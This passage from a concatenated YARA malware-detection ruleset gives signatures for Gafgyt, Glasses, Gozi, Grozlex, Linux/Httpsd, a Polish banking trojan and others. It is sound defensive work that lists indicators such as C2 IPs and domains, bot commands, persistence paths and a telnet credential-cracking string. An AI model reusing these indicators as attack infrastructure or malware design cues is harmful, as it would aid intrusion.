ff0500a04200381dea604400740da1d8 } /* Opcode */ $op517 = { 64004300c784248c } /* Opcode */ $op518 = { 60114300c78424b8 } /* Opcode */ $op519 = { 895ddc895de0ff901404000085c00f85 } /* Opcode */ $op520 = { 895ddc895de0ff901404000085c00f85 } /* Opcode */ $op521 = { b8244400c78424e0 } /* Opcode */ $op522 = { 895c2464895c2468ff901404000085c0 } /* Opcode */ $op523 = { ff742414a1d8604400ff742414ff9000 } /* Opcode */ $op524 = { c4104300c784248c } /* Opcode */ $op525 = { 5f85c0740633c033d2c9c38b45e88b55 } /* Opcode */ $op526 = { 90974300c78424e8 } /* Opcode */ $op527 = { 4c274100c781a403000087094100c781 } /* 
Opcode */ $op528 = { 88e84200c78424ec } /* Opcode */ $op529 = { 5983f8027669a1d86044005368feff00 } /* Opcode */ $op530 = { 83c41889458c837d8c000f8407040000 } /* Opcode */ $op531 = { a1d86044008d5e0c6828c6430053ff90 } /* Opcode */ $op532 = { ff7508a1d8604400ff7308ff90ac0300 } /* Opcode */ $op533 = { 66837938020f86d5 } /* Opcode */ $op534 = { 94dd4200c78424b8 } /* Opcode */ $op535 = { 83c414c60437008bc75f5ec3568b7424 } /* Opcode */ $op536 = { 83c40c3bfb0f94c05e5f5bc9c3558bec } /* Opcode */ $op537 = { a1d86044005657beff7f000056ff7508 } /* Opcode */ $op538 = { a1d86044005657beff7f000056ff7508 } /* Opcode */ $op539 = { 68a4454300ff7588a1d8604400ff9020 } /* Opcode */ $op540 = { 0f8260ffffffa1d86044006820214400 } /* Opcode */ $op541 = { 8b45fc8d048603433a50a1d8604400ff } /* Opcode */ $op542 = { 84244400c78424d0 } /* Opcode */ $op543 = { f0114300c78424e0 } /* Opcode */ $op544 = { 0c974300c78424c0 } /* Opcode */ $op545 = { 282a4400c78424b4 } /* Opcode */ $op546 = { 83c8ffe95c010000836508008d450850 } /* Opcode */ $op547 = { 7c524300c78424c8 } /* Opcode */ $op548 = { 34524300c78424bc } /* Opcode */ $op549 = { d8e64200c784248c } /* Opcode */ $op550 = { 98114300c78424c8 } /* Opcode */ $op551 = { 68b8404300ff75b8a1d8604400ff9020 } /* Opcode */ $op552 = { 7ce84200c78424e8 } /* Opcode */ $op553 = { 8b0dd8604400536689450aff91e8 } /* Opcode */ $op554 = { 598d44000250ff75108d45f46a026a00 } /* Opcode */ $op555 = { 598d44000250ff75108d45f46a026a00 } /* Opcode */ $op556 = { 20de4200c78424e0 } /* Opcode */ $op557 = { 59803de2604400007443a1d860440057 } /* Opcode */ $op558 = { 8b45088b50183bca0f82270100008b40 } /* Opcode */ $op559 = { 83c41ca1d860440053ff7508ff909001 } /* Opcode */ $op560 = { 1c014300c78424b0 } /* Opcode */ $op561 = { e986feffffa1d86044005357685ca042 } /* Opcode */ $op562 = { d4534300c78424f8 } /* Opcode */ $op563 = { 0ca34200c7842488 } /* Opcode */ $op564 = { 8b7d0ceb2550a1d8604400ff90e8 } /* Opcode */ $op565 = { 8b5dfc3bde75053975f4747b33c03bde } /* Opcode */ $op566 = { 
598d4400028945f4ff7508a1d8604400 } /* Opcode */ $op567 = { 8b48048945f8b80010000083c40c3945 } /* Opcode */ $op568 = { ff750c50a1d8604400ff90c403000059 } /* Opcode */ $op569 = { 817c2414102700000f8fcc } /* Opcode */ $op570 = { ff75e8a1d8604400ff75ecff7508ff50 } /* Opcode */ $op571 = { a1a890420089818c020000a1dc904200 } /* Opcode */ $op572 = { 24a34200c784248c } /* Opcode */ $op573 = { 28524300c78424b8 } /* Opcode */ $op574 = { 84514300c784249c } /* Opcode */ $op575 = { a1d860440033db536838234400685823 } /* Opcode */ $op576 = { 34114300c78424ac } /* Opcode */ $op577 = { f0dc4200c7842490 } /* Opcode */ $op578 = { 6888454300ff7588a1d8604400ff9020 } /* Opcode */ $op579 = { 8b44242483c00450ff7508e830bfffff } /* Opcode */ $op580 = { 83c41803c050ff75ec8b45e853ff1050 } /* Opcode */ $op581 = { ff90480200005f85c0740432c0c9c38b } /* Opcode */ $op582 = { ff90a00300008bf08d45fc50a1d86044 } /* Opcode */ $op583 = { 59a1d86044006a0468dcb3430068e8b3 } /* Opcode */ $op584 = { 5c974300c78424d4 } /* Opcode */ $op585 = { 70014300c78424c0 } /* Opcode */ $op586 = { 6a228d45ec50ff757ca1d8604400c745 } /* Opcode */ $op587 = { 8b55fc8b4f3a0500f0ffff83c410ff45 } /* Opcode */ $op588 = { d8294400c78424a8 } /* Opcode */ $op589 = { c7812801000020ca4000c78118030000 } /* Opcode */ $op590 = { 83c40c8d45dc5068000104008d45fc50 } /* Opcode */ $op591 = { e4e74200c78424c8 } /* Opcode */ $op592 = { 895de0895de4ff90140400008bf881ff } /* Opcode */ $op593 = { 595985c075e38b45e08946288b4608ff } /* Opcode */ $op594 = { a1d860440083c448ff7604ff75fc5368 } /* Opcode */ $op595 = { dc964300c78424b4 } /* Opcode */ $op596 = { 6848f24300ff75fcff91500300008b0d } /* Opcode */ $op597 = { 515350a1d860440057ff90700100008b } /* Opcode */ $op598 = { b8e84200c78424f8 } /* Opcode */ $op599 = { 14a44200c78424bc } /* Opcode */ $op600 = { 689c444300ff7588a1d8604400ff9020 } /* Opcode */ $op601 = { 7e4300c7842484070000087e4300c784 } /* Opcode */ $op602 = { 3c964300c7842488 } /* Opcode */ $op603 = { 94de4200c78424f8 } /* Opcode */ 
$op604 = { 50a1d86044005356ff900c040000ff75 } /* Opcode */ $op605 = { 3e834100c781400100006a664100c781 } /* Opcode */ $op606 = { 60e84200c78424e0 } /* Opcode */ $op607 = { 79fe4000a104904200898100030000c7 } /* Opcode */ $op608 = { 7ca34200c784249c } /* Opcode */ $op609 = { ff90140400003d220000c075408d4424 } /* Opcode */ $op610 = { 68974300c78424d8 } /* Opcode */ $op611 = { 58244400c78424c0 } /* Opcode */ $op612 = { 83c410a1d86044005756ff74241cff90 } /* Opcode */ $op613 = { 83c428ff74240ca1d86044005653ff90 } /* Opcode */ $op614 = { a1d860440068c821440056ff90f0 } /* Opcode */ $op615 = { 8975e48975e88975fcff901404000085 } /* Opcode */ $op616 = { 68ac414300ff75b8a1d8604400ff9020 } /* Opcode */ $op617 = { 50a1d8604400ff900403000084c0a1d8 } /* Opcode */ $op618 = { ff902404000059598d45e050a1d86044 } /* Opcode */ $op619 = { 8975ec8975f0ff90a80300005f5e85c0 } /* Opcode */ $op620 = { 8975ec8975f0ff90a80300005f5e85c0 } /* Opcode */ $op621 = { 83c41485c0740cc7461003 } /* Opcode */ $op622 = { 85c0740583c8ffeb088b45e889461433 } /* Opcode */ $op623 = { 50dd4200c78424a4 } /* Opcode */ $op624 = { 895dbc895dfcff90800300003bc30f84 } /* Opcode */ $op625 = { c4524300c78424d4 } /* Opcode */ $op626 = { f8504300c7842484 } /* Opcode */ $op627 = { c0e64200c7842484 } /* Opcode */ $op628 = { a4014300c78424d4 } /* Opcode */ $op629 = { b4e74200c78424bc } /* Opcode */ $op630 = { a1d860440057ff7508ff90900100008b } /* Opcode */ $op631 = { 33ff83c4103bc7743b8b5b3a8b4d0c03 } /* Opcode */ $op632 = { a19c904200c781000200008d9d4100c7 } /* Opcode */ $op633 = { 68a84000c7812c0400008a5b4100c781 } /* Opcode */ $op634 = { 6a06bf10f3430057894df0ff90400200 } /* Opcode */ $op635 = { fc244400c78424f4 } /* Opcode */ $op636 = { 5959837df8007505e982 } /* Opcode */ $op637 = { 082b4400c78424d4 } /* Opcode */ $op638 = { 33c03bfb590f94c05f5e5bc9c3558bec } /* Opcode */ $op639 = { a8a34200c78424a4 } /* Opcode */ $op640 = { 08de4200c78424dc } /* Opcode */ $op641 = { 28dd4200c784249c } /* Opcode */ $op642 = { 
d4244400c78424e8 } /* Opcode */ $op643 = { 5933ffeb1fff75100fb7450c50a1d860 } /* Opcode */ $op644 = { a1d860440057ff7508ff909001000083 } /* Opcode */ $op645 = { a1d860440057ff7508ff909001000083 } /* Opcode */ $op646 = { e4a34200c78424b0 } /* Opcode */ $op647 = { ff7518ff75145753ff90b0 } /* Opcode */ $op648 = { 1ca44200c78424c0 } /* Opcode */ $op649 = { 8d8500feffff689869430068ff } /* Opcode */ $op650 = { a3594000c7814404000014864100c781 } /* Opcode */ $op651 = { 598b0685c0740e50ff7608e8b7ffffff } /* Opcode */ $op652 = { a1d860440056ff9068010000a1d86044 } /* Opcode */ $op653 = { 897424688974246cff905001000085c0 } /* Opcode */ $op654 = { f8014300c78424ec } /* Opcode */ $op655 = { 83c40ceb2aff7308508d471450a1d860 } /* Opcode */ $op656 = { 83c41084db7510a1d8604400682cfe42 } /* Opcode */ $op657 = { 8b450cff742414668378023f50a1d860 } /* Opcode */ $op658 = { 24e84200c78424d4 } /* Opcode */ $op659 = { 595f5e8ac35bc9c3558bec83ec1ca1d8 } /* Opcode */ $op660 = { e0014300c78424e4 } /* Opcode */ $op661 = { 83c40c5e5b5fc9c3558bec5151a1d860 } /* Opcode */ $op662 = { fc004300c78424a8 } /* Opcode */ $op663 = { eb16ff71080fbfca83c04c5150a1d860 } /* Opcode */ $op664 = { 88964300c78424a0 } /* Opcode */ $op665 = { cce64200c7842488 } /* Opcode */ $op666 = { 83c40c5f33c05e5dc38b4c24040fbe41 } /* Opcode */ $op667 = { b8014300c78424d8 } /* Opcode */ $op668 = { 6868f24300ff75fcff91500300008b0d } /* Opcode */ $op669 = { 8b433a8b4dfc8d048803c650a1d86044 } /* Opcode */ $op670 = { ea4200c784243c01000010ea4200c784 } /* Opcode */ $op671 = { 83c42085ff750433c0eb4b8b763a8d44 } /* Opcode */ $op672 = { 24a44200c78424c4 } /* Opcode */ $op673 = { 83c40cff7588ff7508a1d8604400ff90 } /* Opcode */ $op674 = { 7c2a4400c78424c0 } /* Opcode */ $op675 = { 8b4300c78424540b00000c8b4300c784 } /* Opcode */ $op676 = { 50a1d860440057681cb14300682cb143 } /* Opcode */ $op677 = { f8234400c7842494 } /* Opcode */ $op678 = { 808d45f850a1d86044006a00ff902001 } /* Opcode */ $op679 = { 8b463a03c350a1d8604400ff90780200 } /* 
Opcode */ $op680 = { ff7608a1d8604400ff901c0100008bd8 } /* Opcode */ $op681 = { ff45fc817dfc102700000f8ffb } /* Opcode */ $op682 = { 740ac7050461440006 } /* Opcode */ $op683 = { 7a4300c784245c0600001c7a4300c784 } /* Opcode */ $op684 = { 94004300c7842498 } /* Opcode */ $op685 = { 9c4300c784243c0200000c9c4300c784 } /* Opcode */ $op686 = { a1d86044006a006828c84300ff7508ff } /* Opcode */ $op687 = { 70524300c78424c4 } /* Opcode */ $op688 = { d6e94000c781b801000076d14000c781 } /* Opcode */ $op689 = { 598d440002506844c743006a016a008d } /* Opcode */ $op690 = { 598d440002508b442434576840474400 } /* Opcode */ $op691 = { a1d860440057ff7508ff9090010000ff } /* Opcode */ $op692 = { 88dd4200c78424b4 } /* Opcode */ $op693 = { 50a1d86044005668005043005653ff90 } /* Opcode */ $op694 = { 98534300c78424ec } /* Opcode */ $op695 = { 8b44240c83c04468dc68430050a1d860 } /* Opcode */ $op696 = { 5068000010808d44245050a1d8604400 } /* Opcode */ $op697 = { 98014300c78424d0 } /* Opcode */ $op698 = { 3c014300c78424b8 } /* Opcode */ $op699 = { 9c514300c78424a0 } /* Opcode */ $op700 = { 59ff75e8ff7508a1d8604400ff909001 } /* Opcode */ $op701 = { e9aafeffffa1d86044006a006affff50 } /* Opcode */ $op702 = { ff742414a1d8604400ff7508ff903404 } /* Opcode */ $op703 = { bbd03f00003bf36a010f8e9f } /* Opcode */ $op704 = { 2cde4200c78424e4 } /* Opcode */ $op705 = { 28114300c78424a8 } /* Opcode */ $op706 = { 38a34200c7842490 } /* Opcode */ $op707 = { 38a44200c78424cc } /* Opcode */ $op708 = { 682c43440050a1d860440053ff902c03 } /* Opcode */ $op709 = { f8dc4200c7842494 } /* Opcode */ $op710 = { ff0500a04200a2c3604400a1d8604400 } /* Opcode */ $op711 = { 68b0444300ff7588a1d8604400ff9020 } /* Opcode */ $op712 = { 50ff750ca1d860440057ff9094 } /* Opcode */ $op713 = { 242b4400c78424d8 } /* Opcode */ $op714 = { 833dfc60440000750ac705fc6044006c } /* Opcode */ $op715 = { 68a34200c7842498 } /* Opcode */ $op716 = { cce74200c78424c4 } /* Opcode */ $op717 = { 83c41485c00f8440feffffc7461004 } /* Opcode */ $op718 = { 
83c40c8d34463b5d1474024646433b5d } /* Opcode */ $op719 = { e0a34200c78424ac } /* Opcode */ $op720 = { 8b75108b363bf30f8d92 } /* Opcode */ $op721 = { e8014300c78424e8 } /* Opcode */ $op722 = { 38024300c78424fc } /* Opcode */ $op723 = { 0c524300c78424b4 } /* Opcode */ $op724 = { 60e74200c78424ac } /* Opcode */ $op725 = { d8dc4200c7842488 } /* Opcode */ $op726 = { 3c244400c78424b4 } /* Opcode */ $op727 = { 6a2f8d45b850ff757ca1d8604400c745 } /* Opcode */ $op728 = { 6683780a3a0f85b6 } /* Opcode */ $op729 = { b0534300c78424f0 } /* Opcode */ $op730 = { 68c8414300ff75b8a1d8604400ff9020 } /* Opcode */ $op731 = { 44124300c78424f8 } /* Opcode */ $op732 = { 78244400c78424cc } /* Opcode */ $op733 = { 8d8500feffff686c69430068ff } /* Opcode */ $op734 = { 7c014300c78424c4 } /* Opcode */ $op735 = { a1d86044005653ff909001000083c41c } /* Opcode */ $op736 = { 65fb4000c7811402000051624100c781 } /* Opcode */ $op737 = { ff751050ff7508a1d8604400ff902c03 } /* Opcode */ $op738 = { ff75f88d431050ff7508a1d8604400ff } /* Opcode */ $op739 = { 8b55148b1285d20f8c1f0100000fbf70 } /* Opcode */ $op740 = { 58024300c78424000100007c024300c7 } /* Opcode */ $op741 = { 84014300c78424c8 } /* Opcode */ $op742 = { 83c40c433b5d148d7446027cd233c066 } /* Opcode */ $op743 = { 50a1d8604400ff90a402000083c41ceb } /* Opcode */ $op744 = { 70dd4200c78424ac } /* Opcode */ $op745 = { 7cdd4200c78424b0 } /* Opcode */ $op746 = { ff742444894424588b44242c83c04450 } /* Opcode */ $op747 = { 50a1d86044005768e4a743006814a943 } /* Opcode */ $op748 = { cc2b4400c78424ec } /* Opcode */ $op749 = { a4114300c78424cc } /* Opcode */ $op750 = { 68f05a44008945f0578d45f050a1d860 } /* Opcode */ $op751 = { 1f4400c7842490030000101f4400c784 } /* Opcode */ $op752 = { 38294400c7842490 } /* Opcode */ $op753 = { dc2b4400c78424f0 } /* Opcode */ $op754 = { 9a4300c78424a8010000089a4300c784 } /* Opcode */ $op755 = { 8b44242083c00450ff7508a1d8604400 } /* Opcode */ $op756 = { 595f5ec9c3558bec83ec2c6a0b8d45d4 } /* Opcode */ $op757 = { 
598d44000250536a016a008d45ec50ff } /* Opcode */ $op758 = { e4e84200c7842400010000fce84200c7 } /* Opcode */ $op759 = { 8b75108b363bf20f8dd5 } /* Opcode */ $op760 = { 8a44242783c4145f5e5b8be55dc3558b } /* Opcode */ $op761 = { 8a44242783c4145f5e5b8be55dc3558b } /* Opcode */ $op762 = { 08e84200c78424d0 } /* Opcode */ $op763 = { 54004300c7842488 } /* Opcode */ $op764 = { 8b45f40145f02945ec83c40cff45fc8b } /* Opcode */ $op765 = { ece64200c7842490 } /* Opcode */ $op766 = { 59a1d86044005653ff75f8ff90d40300 } /* Opcode */ $op767 = { 59a1d8604400536808b3430056c745c8 } /* Opcode */ $op768 = { 30a44200c78424c8 } /* Opcode */ $op769 = { c4244400c78424e4 } /* Opcode */ $op770 = { ff45fc817dfce80300000f8fac } /* Opcode */ $op771 = { c4a34200c78424a8 } /* Opcode */ $op772 = { e56d4100c781880200004e9e4100c781 } /* Opcode */ $op773 = { 30964300c7842484 } /* Opcode */ $op774 = { 0f8252ffffffa1d860440053ff7508ff } /* Opcode */ condition: ( uint16(0) == 0x5a4d and filesize < 900KB and ( 5 of ($s*) )and 1 of ($op*) ) or ( all of them ) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. 
*/

// Gafgyt family rules by Joan Soriano. Each rule fires only when every
// listed string is present; the MD5/SHA1 meta values presumably identify
// the reference sample the strings were taken from (not checked here).
rule Gafgyt_Botnet_generic : MALW {
    meta:
        description = "Gafgyt Trojan"
        author = "Joan Soriano / @joanbtl"
        date = "2017-05-01"
        version = "1.0"
        MD5 = "e3fac853203c3f1692af0101eaad87f1"
        SHA1 = "710781e62d49419a3a73624f4a914b2ad1684c6a"
    strings:
        // "admin" / "root" alone are ubiquitous; the busybox marker is the
        // discriminating string and the condition requires it as well.
        $etcTZ = "/bin/busybox;echo -e 'gayfgt'"
        $s2 = "/proc/net/route"
        $s3 = "admin"
        $s4 = "root"
    condition:
        $etcTZ and $s2 and $s3 and $s4
}

// NOTE(review): the meta date "2017-05-025" is not a valid date; the other
// rules by this author in this group are dated 2017-05-25 or 2017-05-01 --
// confirm the intended value with the author before correcting.
rule Gafgyt_Botnet_oh : MALW {
    meta:
        description = "Gafgyt Trojan"
        author = "Joan Soriano / @joanbtl"
        date = "2017-05-025"
        version = "1.0"
        MD5 = "97f5edac312de349495cb4afd119d2a5"
        SHA1 = "916a51f2139f11e8be6247418dca6c41591f4557"
    strings:
        $s1 = "busyboxterrorist"
        $s2 = "BOGOMIPS"
        // Format string for a scanner target range; the literal prefix is an IoC of this sample.
        $s3 = "124.105.97.%d"
        $s4 = "fucknet"
    condition:
        $s1 and $s2 and $s3 and $s4
}

rule Gafgyt_Botnet_bash : MALW {
    meta:
        description = "Gafgyt Trojan"
        author = "Joan Soriano / @joanbtl"
        date = "2017-05-25"
        version = "1.0"
        MD5 = "c8d58acfe524a09d4df7ffbe4a43c429"
        SHA1 = "b41fefa8470f3b3657594af18d2ea4f6ac4d567f"
    strings:
        // Bot command keywords as they appear in the binary.
        $s1 = "PONG!"
        $s2 = "GETLOCALIP"
        $s3 = "HTTPFLOOD"
        $s4 = "LUCKYLILDUDE"
    condition:
        $s1 and $s2 and $s3 and $s4
}

rule Gafgyt_Botnet_hoho : MALW {
    meta:
        description = "Gafgyt Trojan"
        author = "Joan Soriano / @joanbtl"
        date = "2017-05-25"
        version = "1.0"
        MD5 = "369c7c66224b343f624803d595aa1e09"
        SHA1 = "54519d2c124cb536ed0ddad5683440293d90934f"
    strings:
        // IRC protocol keywords plus a hard-coded C2 address from this sample.
        $s1 = "PING"
        $s2 = "PRIVMSG"
        $s3 = "Remote IRC Bot"
        $s4 = "23.95.43.182"
    condition:
        $s1 and $s2 and $s3 and $s4
}

rule Gafgyt_Botnet_jackmy : MALW {
    meta:
        description = "Gafgyt Trojan"
        author = "Joan Soriano / @joanbtl"
        date = "2017-05-25"
        version = "1.0"
        MD5 = "419b8a10a3ac200e7e8a0c141b8abfba"
        SHA1 = "5433a5768c5d22dabc4d133c8a1d192d525939d5"
    strings:
        $s1 = "PING"
        $s2 = "PONG"
        $s3 = "jackmy"
        $s4 = "203.134.%d.%d"
    condition:
        $s1 and $s2 and $s3 and $s4
}

rule Gafgyt_Botnet_HIHI: MALW {
    meta:
        description = "Gafgyt Trojan"
        author = "Joan Soriano / @joanbtl"
        date = "2017-05-01"
        version = "1.0"
        MD5 = "cc99e8dd2067fd5702a4716164865c8a"
        SHA1 = "b9b316c1cc9f7a1bf8c70400861de08d95716e49"
    strings:
        $s1 = "PING"
        $s2 = "PONG"
        // Report format for harvested telnet credentials (host:user:pass).
        $s3 = "TELNET LOGIN CRACKED - %s:%s:%s"
        $s4 = "ADVANCEDBOT"
        $s5 = "46.166.185.92"
        $s6 = "LOLNOGTFO"
    condition:
        $s1 and $s2 and $s3 and $s4 and $s5 and $s6
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

// Genome: three runtime strings, all required.
rule genome {
    meta:
        author = "Brian Wallace @botnet_hunter"
        author_email = "bwall@ballastsecurity.net"
        date = "2014-09-07"
        description = "Identify Genome"
    strings:
        // Error text from a keyboard-monitoring component; the other two
        // strings are generic (a key name and an MSVC RTTI error) and only
        // add confidence because all three are required.
        $s1 = "Attempting to create more than one keyboard::Monitor instance"
        $s2 = "{Right windows}"
        $s3 = "Access violation - no RTTI data!"
    condition:
        all of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

import "pe"

// Glasses (Citizen Lab): a private code-pattern rule and a strings rule,
// combined by the public rule Glasses below.
private rule GlassesCode : Glasses Family {
    meta:
        description = "Glasses code features"
        author = "Seth Hardy"
        last_modified = "2021-11-18"
        reference_file = "aaf262fde1738dbf0bb50213a9624cd6705ebcaeb06c5fcaf7e9f33695d3fc33"
        reference_url = "https://citizenlab.ca/2013/02/apt1s-glasses-watching-a-human-rights-organization/"
    strings:
        // Both sequences appear to be compiler idioms for division/modulo by 3
        // (multiply by 0xAAAAAAAB / 0x55555556) -- TODO confirm against the sample;
        // such idioms are compiler output and may occur in unrelated binaries.
        $ = { B8 AB AA AA AA F7 E1 D1 EA 8D 04 52 2B C8 }
        $ = { B8 56 55 55 55 F7 E9 8B 4C 24 1C 8B C2 C1 E8 1F 03 D0 49 3B CA }
    condition:
        any of them
}

rule GlassesStrings : Glasses Family {
    meta:
        description = "Strings used by Glasses"
        author = "Seth Hardy"
        last_modified = "2021-11-18"
        reference_file = "aaf262fde1738dbf0bb50213a9624cd6705ebcaeb06c5fcaf7e9f33695d3fc33"
        reference_url = "https://citizenlab.ca/2013/02/apt1s-glasses-watching-a-human-rights-organization/"
    strings:
        // Misspelled pangram, a User-Agent template and an HTML fragment; all three required.
        $ = "thequickbrownfxjmpsvalzydg"
        $ = "Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0; %s.%s)"
        $ = "\" target=\"NewRef\"></a>"
    condition:
        all of them
}

rule Glasses : Family {
    meta:
        description = "Glasses family"
        author = "Seth Hardy"
        last_modified = "2021-11-18"
        reference_file = "aaf262fde1738dbf0bb50213a9624cd6705ebcaeb06c5fcaf7e9f33695d3fc33"
        reference_url = "https://citizenlab.ca/2013/02/apt1s-glasses-watching-a-human-rights-organization/"
    condition:
        // Requires both the code pattern and the string set above.
        GlassesCode and GlassesStrings
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

rule GoziRule : Gozi Family {
    meta:
        description = "Win32.Gozi"
        author = "CCN-CERT"
        version = "1.0"
        ref = "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html"
    strings:
        // UTF-16LE "cookies.sqlite-journal", a NUL terminator, then ASCII "OPERA.EXE\0".
        $ = {63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 6F 00 75 00 72 00 6E 00 61 00 6C 00 00 00 4F 50 45 52 41 2E 45 58 45 00}
    condition:
        all of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

import "pe"

rule Grozlex : Stealer {
    meta:
        author="Kevin Falcoz"
        date="20/08/2013"
        description="Grozlex Stealer - Possible HCStealer"
    strings:
        // UTF-16LE "Logs attached by iCozen".
        $signature={4C 00 6F 00 67 00 73 00 20 00 61 00 74 00 74 00 61 00 63 00 68 00 65 00 64 00 20 00 62 00 79 00 20 00 69 00 43 00 6F 00 7A 00 65 00 6E}
    condition:
        $signature
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

// Polish banking malware with IRC-style infrastructure. Four independent
// string groups; any one satisfied group is enough to match.
// NOTE(review): the condition has no MZ / filesize gate despite
// filetype = "exe", and a single $b* e-mail address string is sufficient
// on its own -- expect hits on non-executable data that merely quotes them.
rule Hsdfihdf: banking malware {
    meta:
        author = "Adam Ziaja <adam@adamziaja.com> http://adamziaja.com"
        date = "2014-04-06"
        description = "Polish banking malware"
        hash0 = "db1675c74a444fd35383d9a45631cada"
        hash1 = "f48ba39df38056449a3e9a1a7289f657"
        filetype = "exe"
    strings:
        // $s*: mostly opaque byte runs taken from the samples ($s0 and $s8
        // look like runtime identifiers -- unverified); 14 of 15 required.
        $s0 = "ANSI_CHARSET"
        $s1 = "][Vee_d_["
        $s2 = "qfcD:6<"
        $s3 = "%-%/%1%3%5%7%9%;%"
        $s4 = "imhzxsc\\WWKD<.)w"
        $s5 = "Vzlarf\\]VOZVMskf"
        $s6 = "JKWFAp\\Z"
        $s7 = "<aLLwhg"
        $s8 = "bdLeftToRight"
        $s9 = "F/.pTC7"
        $s10 = "O><8,)-$ "
        $s11 = "mjeUB>D.'8)5\\\\vhe["
        $s12 = "JGiVRk[W]PL("
        $s13 = "zwWNNG:8"
        $s14 = "zv7,'$"
        // $a*: presumably an IRC channel name and server; both required.
        $a0 = "#hsdfihdf"
        $a1 = "polska.irc.pl"
        // $b*: operator e-mail addresses; one is enough.
        $b0 = "firehim@o2.pl"
        $b1 = "firehim@go2.pl"
        $b2 = "firehim@tlen.pl"
        // $c*: infrastructure host names; two required.
        $c0 = "cyberpunks.pl"
        $c1 = "kaper.phrack.pl"
        $c2 = "serwer.uk.to"
        $c3 = "ns1.ipv4.hu"
        $c4 = "scorebot.koth.hu"
        $c5 = "esopoland.pl"
    condition:
        14 of ($s*) or all of ($a*) or 1 of ($b*) or 2 of ($c*)
}

/* Yara rule to detect Linux/Httpsd generic This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

// Shared string set for the Linux/Httpsd rules below. Private: it never
// reports on its own, it is only referenced from the ARM and i686 rules.
// NOTE(review): $st01 and $st10 are the same string; with `all of them`
// the duplicate is harmless but redundant.
private rule is__LinuxHttpsdStrings {
    meta:
        description = "Strings of ELF Linux/Httpsd (backdoor, downloader, remote command execution)"
        ref1 = "https://imgur.com/a/8mFGk"
        ref2 = "https://otx.alienvault.com/pulse/5a49115f93199b171b90a212"
        ref3 = "https://misppriv.circl.lu/events/view/9952"
        author = "unixfreaxjp"
        org = "MalwareMustDie"
        date = "2018-01-02"
        sha256 = "dd1266561fe7fcd54d1eb17efbbb6babaa9c1f44b36cef6e06052e22ce275ccd"
        sha256 = "1b3718698fae20b63fbe6ab32411a02b0b08625f95014e03301b49afaee9d559"
    strings:
        // C2 host and beacon/result format strings.
        $st01 = "k.conectionapis.com" fullword nocase wide ascii
        $st02 = "key=%s&host_name=%s&cpu_count=%d&os_type=%s&core_count=%s" fullword nocase wide ascii
        $st03 = "id=%d&result=%s" fullword nocase wide ascii
        // Short command words; `fullword` and `all of them` keep them from matching alone.
        $st04 = "rtime" fullword nocase wide ascii
        $st05 = "down" fullword nocase wide ascii
        $st06 = "cmd" fullword nocase wide ascii
        // Persistence artefacts: a cron entry and its drop path.
        $st07 = "0 */6 * * * root" fullword nocase wide ascii
        $st08 = "/etc/cron.d/httpsd" fullword nocase wide ascii
        $st09 = "cat /proc/cpuinfo |grep processor|wc -l" fullword nocase wide ascii
        $st10 = "k.conectionapis.com" fullword nocase wide ascii
        $st11 = "/api" fullword nocase wide ascii
        // Hidden working files used by the implant.
        $st12 = "/tmp/.httpslog" fullword nocase wide ascii
        $st13 = "/bin/.httpsd" fullword nocase wide ascii
        $st14 = "/tmp/.httpsd" fullword nocase wide ascii
        $st15 = "/tmp/.httpspid" fullword nocase wide ascii
        $st16 = "/tmp/.httpskey" fullword nocase wide ascii
    condition:
        all of them
}

// ARM build: function prologues (author-labelled) plus the shared strings,
// gated on the ELF header via the private rule is__elf defined earlier in
// this file and on a 200KB size cap.
rule Linux_Httpsd_malware_ARM {
    meta:
        description = "Detects Linux/Httpsd ARMv5"
        date = "2017-12-31"
    strings:
        $hexsts01 = { f0 4f 2d e9 1e db 4d e2 ec d0 4d e2 01 40 a0 e1 } // main
        $hexsts02 = { f0 45 2d e9 0b db 4d e2 04 d0 4d e2 3c 01 9f e5 } // self-rclocal
        $hexsts03 = { f0 45 2d e9 01 db 4d e2 04 d0 4d e2 bc 01 9f e5 } // copy-self
    condition:
        all of them and is__elf and is__LinuxHttpsdStrings and filesize < 200KB
}

// i686 build: same structure as the ARM rule with x86 prologues.
rule Linux_Httpsd_malware_i686 {
    meta:
        description = "Detects ELF Linux/Httpsd i686"
        date = "2018-01-02"
    strings:
        $hexsts01 = { 8d 4c 24 04 83 e4 f0 ff 71 fc 55 89 e5 57 56 53 } // main
        $hexsts02 = { 55 89 e5 57 56 53 81 ec 14 2c 00 00 68 7a 83 05 } // self-rclocal
        $hexsts03 = { 55 89 e5 57 56 53 81 ec 10 04 00 00 68 00 04 00 } // copy-self
    condition:
        all of them and is__elf and is__LinuxHttpsdStrings and filesize < 200KB
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

import "pe"

// IMuler (OS X). None of the three IMuler rules references the pe module,
// so the import above is unused by them.
rule IMulerCode : IMuler Family {
    meta:
        description = "IMuler code tricks"
        author = "Seth Hardy"
        last_modified = "2014-06-16"
    strings:
        // Load these function strings 4 characters at a time. These check the first two blocks:
        // (C7 = mov [mem], imm32; the immediates spell "/tmp" "/Spo", "TMPA" "AABB",
        // "FILE" "AGEN", "TMP0" "M34J", "/tmp" "/.md" respectively.)
        $L4_tmpSpotlight = { C7 ?? 2F 74 6D 70 C7 ?? 04 2F 53 70 6F }
        $L4_TMPAAABBB = { C7 ?? ?? ?? ?? ?? 54 4D 50 41 C7 ?? ?? ?? ?? ?? 41 41 42 42 }
